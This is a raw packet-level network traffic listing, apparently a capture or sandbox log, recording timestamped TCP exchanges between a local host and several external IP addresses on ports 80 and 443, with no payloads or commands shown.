Dec 14, 2024 12:56:10.580708981 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.580765963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.580826044 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.582448959 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.582504988 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.582586050 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.582643032 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.584135056 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.584204912 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.584244967 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.584304094 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.585611105 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.585673094 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.585719109 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.585777044 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.587277889 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.587346077 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.587394953 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.587455988 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.588943958 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.589016914 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.589118958 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.589174032 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.590581894 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.590646982 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.590722084 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.590790987 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.592405081 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.592499971 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.592511892 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.592575073 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.593930960 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.593987942 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.594033957 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.594088078 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.595659018 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.595719099 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.595727921 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.595773935 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.597301006 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.597366095 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.597460985 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.597522020 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.599654913 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.599713087 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.599800110 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.599854946 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.601039886 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.601095915 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.601136923 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.601191998 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.602257013 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.602310896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.602360964 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.602421999 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.603914022 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.603974104 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.604012966 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.604077101 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.605559111 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.605618954 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.605654001 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.605775118 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.607218027 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.607292891 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.607337952 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.607391119 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.609014988 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.609072924 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.609100103 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.609154940 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.713638067 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.713656902 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.713785887 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.713939905 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.714082003 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.714140892 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.714212894 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.715277910 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.715331078 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.715400934 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.715400934 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.716559887 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.716624975 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.716789007 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.716965914 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.717914104 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.717993975 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.718049049 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.718111038 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.719136000 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.719202042 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.719243050 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.719310045 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.720469952 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.720530987 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.720580101 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.720653057 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.721843004 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.721909046 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.721944094 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.722198009 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.722974062 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.723040104 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.723078966 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.723140955 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.724195957 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.724282980 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.724301100 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.724359035 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.725428104 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.725487947 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.725541115 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.725601912 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.726648092 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.726711035 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.726721048 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.726780891 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.727868080 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.727932930 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.727981091 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.728035927 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.729094028 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.729155064 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.729228020 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.729304075 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.730319023 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.730396032 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.730431080 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.730489016 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.731563091 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.731631041 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.731650114 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.731709957 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.732793093 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.732852936 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.732914925 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.732974052 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.733998060 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.734057903 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.734122992 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.734183073 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.735296965 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.735332012 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.735358953 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.735409021 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.736516953 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.736543894 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.736581087 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.736613035 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.737668991 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.737740040 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.737787008 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.737848997 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.738922119 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.738986015 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.739003897 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.739069939 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.740117073 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.740197897 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.740235090 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.740298033 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.741339922 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.741405964 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.741446972 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.741507053 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.742563963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.742630005 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.742659092 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.742722034 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.743788004 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.743850946 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.743890047 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.743949890 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.745013952 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.745079041 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.745120049 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.745182037 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.746236086 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.746301889 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.746335030 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.746403933 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.747428894 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.747500896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.747545004 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.747607946 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.748661041 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.748745918 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.748786926 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.748847961 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.749896049 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.749974966 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.750025034 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.750089884 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.751097918 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.751163006 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:12.240598917 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:12.240701914 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:12.240818977 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:12.244770050 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:12.244807005 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:12.937530994 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:12.937978029 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:13.058199883 CET	80	49759	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:13.058219910 CET	80	49772	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:13.058690071 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:13.058695078 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:13.058907986 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:13.178868055 CET	80	49772	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:13.470081091 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:13.470419884 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:13.472404957 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:13.472434998 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:13.472852945 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:13.514442921 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:13.541220903 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:13.541297913 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:13.541492939 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:14.406644106 CET	80	49772	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:14.406820059 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:14.412620068 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:14.607606888 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:14.607839108 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:14.608192921 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:14.727952003 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.391956091 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:15.392205954 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:15.392313957 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:15.394164085 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:15.394207954 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:15.394237041 CET	49771	443	192.168.2.4	104.21.67.145
Dec 14, 2024 12:56:15.394252062 CET	443	49771	104.21.67.145	192.168.2.4
Dec 14, 2024 12:56:15.703299046 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:15.703413010 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:15.703505993 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:15.704010963 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:15.704050064 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:15.940367937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940381050 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940388918 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940591097 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940602064 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940612078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940622091 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940648079 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940660000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:15.940660954 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:15.940747976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:15.940748930 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:15.940918922 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.940944910 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:15.941113949 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:15.941113949 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.060741901 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.060762882 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.061016083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.133025885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.133244038 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.133333921 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.133402109 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.136734009 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.136943102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.137017965 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.137017965 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.142889977 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.143059015 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.143126965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.143322945 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.151901007 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.151943922 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.152081013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.152081013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.160017967 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.160031080 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.160219908 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.168322086 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.168421984 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.168481112 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.168729067 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.176770926 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.176836967 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.177031994 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.177228928 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.185167074 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.185349941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.185359955 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.185434103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.193687916 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.193880081 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.193938971 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.194010019 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.202200890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.202409029 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.202425957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.202483892 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.210627079 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.210743904 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.210828066 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.211051941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.253395081 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.253578901 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.323999882 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.324067116 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.324069023 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.324148893 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.325489998 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.325565100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.325614929 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.325670958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.330533981 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.330609083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.330763102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.330981016 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.335386992 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.335454941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.335513115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.335581064 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.340332031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.340392113 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.340518951 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.340568066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.345338106 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.345407009 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.345490932 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.345546007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.350065947 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.350197077 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.350306034 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.350306988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.354794025 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.354974031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.355063915 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.355140924 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.359582901 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.359659910 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.359986067 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.360188007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.364376068 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.364444971 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.364667892 CET	80	49778	185.215.113.16	192.168.2.4
